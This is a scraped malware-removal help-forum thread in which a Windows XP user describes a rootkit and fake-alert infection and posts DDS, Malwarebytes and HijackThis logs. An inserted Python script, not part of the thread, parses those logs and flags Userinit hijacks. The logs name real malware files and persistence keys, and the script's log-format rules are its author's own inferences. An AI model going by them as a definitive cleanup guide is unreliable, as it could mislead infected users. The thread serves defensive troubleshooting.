StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~2.lnk - c:\program files\common files\microsoft shared\works shared\wkcalrem.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\startg~1.lnk - c:\program files\getright\GetRight.exe
IE: Download with GetRight - c:\program files\getright\GRdownload.htm
IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\program files\java\jre1.6.0_07\bin\ssv.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\progra~1\spybot~1\SDHelper.dll
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} - hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab
DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - hxxp://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1238014490265
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jdk/6u7/jinstall-6u7-windows-i586-jc.cab?e=1222427383613&h=b8ac855f339f32209a0ec00ff741fe50/&filename=jinstall-6u7-windows-i586-jc.cab
DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} - hxxp://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} - hxxp://crucial.com/controls/cpcScanner.cab
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D821DC4A-0814-435E-9820-661C543A4679} - hxxp://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll
Notify: avgrsstarter - avgrsstx.dll
Notify: igfxcui - igfxsrvc.dll
Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll

============= SERVICES / DRIVERS ===============

R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2008-6-19 335240]
R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2008-6-19 27784]
R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-5-24 53760]
R2 avg8wd;AVG8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-2-2 297752]
S3 gkmixern;gkmixern;c:\docume~1\user\locals~1\temp\gkmixern.sys [2003-3-6 15872]
S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\drivers\smcwgu.sys --> c:\windows\system32\drivers\SMCWGU.sys [?]

=============== Created Last 30 ================

2009-09-03 04:25 <DIR> --d----- c:\docume~1\user\applic~1\Malwarebytes
2009-09-03 04:25 38,160 a------- c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-03 04:25 19,096 a------- c:\windows\system32\drivers\mbam.sys
2009-09-03 04:25 <DIR> --d----- c:\program files\Malwarebytes' Anti-Malware
2009-09-03 04:25 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Malwarebytes
2009-08-31 22:37 <DIR> --d----- c:\program files\Trend Micro
2009-08-21 11:05 1,717,410 a------- C:\00.bmp
2009-08-14 18:51 <DIR> --d----- c:\windows\system32\wbem\Repository

==================== Find3M ====================

2009-08-24 03:17 123 a------- C:\drmHeader.bin
2009-08-21 06:10 335,240 a------- c:\windows\system32\drivers\avgldx86.sys
2009-08-21 06:10 11,952 a------- c:\windows\system32\avgrsstx.dll
2008-05-14 18:56 32,768 a--sh--- c:\windows\system32\config\systemprofile\local settings\history\history.ie5\mshist012008051420080515\index.dat
2008-03-27 14:15 49,152 a--sh--- c:\windows\temp\temporary internet files\content.ie5\index.dat

============= FINISH: 12:17:21.40 ===============

I had a look at Attach.txt and thought I'd better clarify a few of the Save/Restore points.
RP574, RP577, RP580, RP595 and RP605 are just Save points I made myself. RP610, which is entitled "wrong", is the Save point I made shortly after the virus attack. This one I made to see if System Restore was working. I know not to ever use this as a Restore point because the viruses are in the system at that time. I will need to delete that Save point (and any after it). All points after that indicate where I was starting to remove programs due to the attack.

Finally, I have run Process Explorer again to see what might be accessing the C: drive every 10 seconds. All it says is that "System" is doing I/O Delta Writes of 6, I/O Delta Write Bytes of 13.5KB and I/O Delta Other of 8. I really don't know what that means. I know you didn't list this program as part of your tests but I get this same reading every time and no specific System process is listed for those readings.

Regards.

Attach.zip
22. Thank you for your response. I am writing any personal text in bold so you can see it more clearly amongst all the logs.

Here is my first MBAM log. I switched off Word Wrap in Notepad because I read somewhere that it messes up the display of the logs:

Malwarebytes' Anti-Malware 1.40
Database version: 2734
Windows 5.1.2600 Service Pack 3

03/09/2009 06:01:26
mbam-log-2009-09-03 (06-01-26).txt

Scan type: Full Scan (C:\|)
Objects scanned: 177140
Time elapsed: 1 hour(s), 25 minute(s), 32 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 8
Registry Values Infected: 1
Registry Data Items Infected: 6
Folders Infected: 1
Files Infected: 13

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{3aa42713-5c1e-48e2-b432-d8bf420dd31d} (Rogue.AntiVirus2008) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{e596df5f-4239-4d40-8367-ebadf0165917} (Rogue.Installer) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{b64f4a7c-97c9-11da-8bde-f66bad1e3f3a} (Rogue.WinAntiVirus) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{1a26f07f-0d60-4835-91cf-1e1766a0ec56} (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{19127ad2-394b-70f5-c650-b97867baa1f7} (Backdoor.Bot) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{43bf8cd1-c5d5-2230-7bb2-98f22c2b7dc6} (Backdoor.Bot) -> Quarantined and deleted successfully.
HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{19127ad2-394b-70f5-c650-b97867baa1f7} (Backdoor.Bot) -> Quarantined and deleted successfully.
HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{43bf8cd1-c5d5-2230-7bb2-98f22c2b7dc6} (Backdoor.Bot) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\UID (Malware.Trace) -> Quarantined and deleted successfully.

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.FakeAlert) -> Data: c:\windows\system32\sdra64.exe -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.FakeAlert) -> Data: system32\sdra64.exe -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel\Homepage (Hijack.Homepage) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Hijack.Userinit) -> Bad: (C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) Good: (Userinit.exe) -> Quarantined and deleted successfully.

Folders Infected:
C:\WINDOWS\system32\lowsec (Stolen.data) -> Delete on reboot.

Files Infected:
C:\WINDOWS\system32\kbiwkmqhoowqev.dll (Rootkit.TDSS) -> Delete on reboot.
C:\WINDOWS\system32\kbiwkmtmawnylv.dll (Rootkit.TDSS) -> Delete on reboot.
C:\WINDOWS\system32\drivers\kbiwkmmpkbneti.sys (Rootkit.TDSS) -> Delete on reboot.
C:\WINDOWS\system32\lowsec\local.ds (Stolen.data) -> Delete on reboot.
C:\WINDOWS\system32\lowsec\user.ds (Stolen.data) -> Delete on reboot.
C:\WINDOWS\system32\lowsec\user.ds.lll (Stolen.data) -> Delete on reboot.
C:\Documents and Settings\user\Application Data\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\sdra64.exe (Trojan.FakeAlert) -> Delete on reboot.
C:\WINDOWS\system32\kbiwkmdjogxnby.dat (Rootkit.TDSS) -> Delete on reboot.
C:\WINDOWS\system32\kbiwkmrcsxevbr.dat (Rootkit.TDSS) -> Delete on reboot.

Here is the most recent log. Please note that I ran a test the following day after the initial scan, plus each day after. They are practically identical in their results to the latest scan. The rootkit gets detected and removed but returns the next day:

Malwarebytes' Anti-Malware 1.40
Database version: 2770
Windows 5.1.2600 Service Pack 3

10/09/2009 09:46:30
mbam-log-2009-09-10 (09-46-30).txt

Scan type: Quick Scan
Objects scanned: 102362
Time elapsed: 17 minute(s), 5 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 1
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\kbiwkmewcpaswe (Rootkit.TDSS) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

Here is my HijackThis log that I have just run:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:32:55, on 10/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\NoAds\NoAds.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\GetRight\GetRight.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing)
O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing)
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe
O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
O4 - HKLM\..\Run: [TFNF5] TFNF5.exe
O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\RunOnce: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab
O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab
O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab
O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing)
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 8371 bytes

I will run the DDS program and post those logs separately after this post.

Regards.
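Editor's added example, not part of the original thread and not Malwarebytes' own tooling: a small Python script that turns MBAM detection lines like the ones posted above into a triage summary. It counts hits per malware family, lists the items marked "Delete on reboot" (files and keys that were in use when the scan ran and are therefore still present until the machine restarts), and pulls the extra executable out of the hijacked Winlogon\Userinit value, which is the persistence mechanism behind the sdra64.exe detections. Assumptions: the "<item> (<family>) -> <action>." layout, the "Bad: (...) Good: (...)" form and the "Data: ... ->" form are inferred from the two logs in the post rather than from any Malwarebytes documentation; the sample lines are copied from those logs; and Windows is taken to live in C:\WINDOWS (the windir parameter overrides that).

```python
import re
from collections import Counter

# Constructed sample: seven detection lines copied from the two Malwarebytes' Anti-Malware
# logs in the post above. The line layout is assumed from those logs, not from any
# Malwarebytes documentation.
SAMPLE_LOG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.FakeAlert) -> Data: c:\windows\system32\sdra64.exe -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Hijack.Userinit) -> Bad: (C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) Good: (Userinit.exe) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\kbiwkmqhoowqev.dll (Rootkit.TDSS) -> Delete on reboot.
C:\WINDOWS\system32\drivers\kbiwkmmpkbneti.sys (Rootkit.TDSS) -> Delete on reboot.
C:\WINDOWS\system32\lowsec\local.ds (Stolen.data) -> Delete on reboot.
C:\Documents and Settings\user\Application Data\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\kbiwkmewcpaswe (Rootkit.TDSS) -> Quarantined and deleted successfully.
"""

# "<item> (<family>) -> <rest>."  Section headers and "(No malicious items detected)"
# lines have no " -> " after the parenthesis and are skipped.
LINE_RE = re.compile(r"^(?P<item>.+?) \((?P<family>[^()]+)\) -> (?P<rest>.+?)\.?$")
# Registry data items carry the offending and the expected value before the action.
BADGOOD_RE = re.compile(r"^Bad: \((?P<bad>.*?)\) Good: \((?P<good>.*?)\) -> (?P<action>.+)$")
DATA_RE = re.compile(r"^Data: (?P<data>.+?) -> (?P<action>.+)$")


def parse_mbam_log(text):
    """Return one dict per detection line: item, family, action, plus bad/good/data when present."""
    hits = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        rec = {"item": m["item"], "family": m["family"], "bad": None, "good": None, "data": None}
        rest = m["rest"]
        bg = BADGOOD_RE.match(rest)
        dt = DATA_RE.match(rest)
        if bg:
            rec.update(bad=bg["bad"], good=bg["good"], action=bg["action"])
        elif dt:
            rec.update(data=dt["data"], action=dt["action"])
        else:
            rec["action"] = rest
        hits.append(rec)
    return hits


def userinit_extras(value, windir=r"C:\WINDOWS"):
    """Return the entries of a Winlogon\\Userinit value other than the genuine userinit.exe.

    Winlogon launches every comma-separated entry at logon, so any extra entry is a logon
    persistence hook. A userinit.exe outside %windir%\\system32 counts as extra as well.
    Assumption: Windows is installed in C:\\WINDOWS unless windir= says otherwise."""
    expected = (windir + r"\system32\userinit.exe").lower()
    extras = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if entry and entry.lower() not in ("userinit.exe", expected):
            extras.append(entry)
    return extras


def triage(text):
    """Summarise a log: hits per family, items still pending a reboot, Userinit hijack entries."""
    hits = parse_mbam_log(text)
    pending = [h["item"] for h in hits if h["action"].lower() == "delete on reboot"]
    hijack = []
    for h in hits:
        if h["bad"] and h["item"].lower().endswith(r"\winlogon\userinit"):
            hijack.extend(userinit_extras(h["bad"]))
    return {
        "families": Counter(h["family"] for h in hits),
        "pending_reboot": pending,
        "userinit_extras": hijack,
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    for family, n in summary["families"].most_common():
        print(f"{n:3d}  {family}")
    print("still present until reboot:")
    for item in summary["pending_reboot"]:
        print("  " + item)
    print("extra Userinit entries:", summary["userinit_extras"])
```

To use it on a real run, read a saved mbam-log-*.txt into triage(). Two points worth checking by hand afterwards: the "Delete on reboot" items (the rootkit driver, its DLLs and the lowsec folder in the first log) should be confirmed gone after the restart, and a service key such as the one in the second log that is recreated after every scan is being re-registered by something still active on the machine, which the log itself cannot name.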
23. System information (Toshiba laptop PC, Windows XP Home, XP firewall, Internet Explorer 7, AVG 8.5 Free Edition, ZyXEL wired router)

My PC has recently been attacked by one or more viruses. It started when I clicked on an apparently innocent forum page, a site which in the past has never posed a problem (not that I visit too often). I immediately received a notification that my XP firewall had been turned off. The hard disk started to get very busy and I knew something wasn't good. I immediately powered off my router to avoid further trouble but I guess by then it was too late.

I went to do a System Restore but I noticed that all of my restore points had been deleted. At the time though, I could create new save points. I knew they would have been worthless as I had already been attacked but wanted to see if I could actually perform it.

I rebooted the PC and saw straight away, upon running Internet Explorer, that my Google searches had been hijacked. Like many other people I have read about that have got infected recently, I was starting to get redirects to Cliccker.cn, among others. Over the course of time, the redirects seemed to grow in frequency, so the correct links became less and less common the first time I clicked on them.

This wasn't the only problem though. My firewall defaulted to Off every time I rebooted and sometimes switched itself off while the PC was running. I also noticed that the hard disk was gently and briefly accessed every ten seconds. It never did this before. I tried using a program called Process Explorer to see what was accessing the disk and while I don't know the program's functionality very well, what graphs to look at and so on, I did see that there was always exactly 13.5KB worth of data being accessed each time. As time went on, System Restore stopped working altogether. CheckDisk stopped working too. Later on I also saw, on bootup, an error saying there was a fault with Pad.exe (part of my laptop's functionality). I am guessing that without a mouse, I probably wasn't even able to scroll around and click on things.

I also did a Windows file search to see what files had been created or modified on the day of the attack. I did catch two .tmp files. One was Serr.tmp and the other was Ocerxawmns.tmp (I can't remember if they started with capital letters). These were in the Temp folder (I'm afraid I cannot remember which one). I looked these up in Google (when it worked). Serr.tmp was listed as a nasty looking virus and with some symptoms that were similar to what I was getting. There weren't a lot of returned searches on this file though, so it seems funny that not a lot of information is available outside the first returned search entry. The second file I mentioned didn't come up in Google at all. I have also seen references to something called tmp.edb, which I cannot tell if it is a virus or not as webpages in Google couldn't give a confirmed answer. Therefore, I don't know exactly how many viruses I had or still have in my system and whether they are related.

AVG detected nothing at all upon the attack and didn't even find anything wrong with Serr.tmp. I also ran Trend's online Housecall 7 Beta which found two trojans. These files were listed as 26C3.tmp (detected as TROJ GEN.0Z10 46) and ~TM27.tmp (TROJ BREDOLAB.EZ). However, it didn't find anything else after further searches and the symptoms continued.

I posted these problems on another forum but never received a reply. During that time I discovered Malwarebytes and figured that, because of the state my PC was in, I had nothing to lose by trying it. It detected multiple viruses and managed to remove most of them. More viruses were discovered on a second scan. Since then I have got Google back under control and System Restore and CheckDisk are working again. XP's firewall stays up this time as well, although I am now finding I can't switch off warnings that I deliberately disabled Auto Updates for Windows.

The save points are still gone. I'm still hearing that little bit of disk access every ten seconds as well (it is really irritating to hear because I can't stop it). I really don't know what is causing it but I don't like the sound of it. I am also seeing one persistent rootkit detected in the registry. It gets deleted but then returns every time.

Finally, I am very concerned that my router has been infected or that something has been altered. I cannot be certain of this but I have noticed that the DSL/Activity light is flickering a lot more often than normal, suggesting traffic. It is even doing this when my PC is switched off. It definitely appears to be busier than before. I read some posts and articles recently that talked about a router's settings or even firmware being altered and it sounded frightening. Is there any way I can check to see if anything has been altered? I'm happy to reset my router to factory settings but if the firmware can get altered, I am guessing a reset won't even help?

I have logs from the Malwarebytes program available and I also recently downloaded HijackThis. I won't post these until you request them though because this post is already long.

Thank you in advance.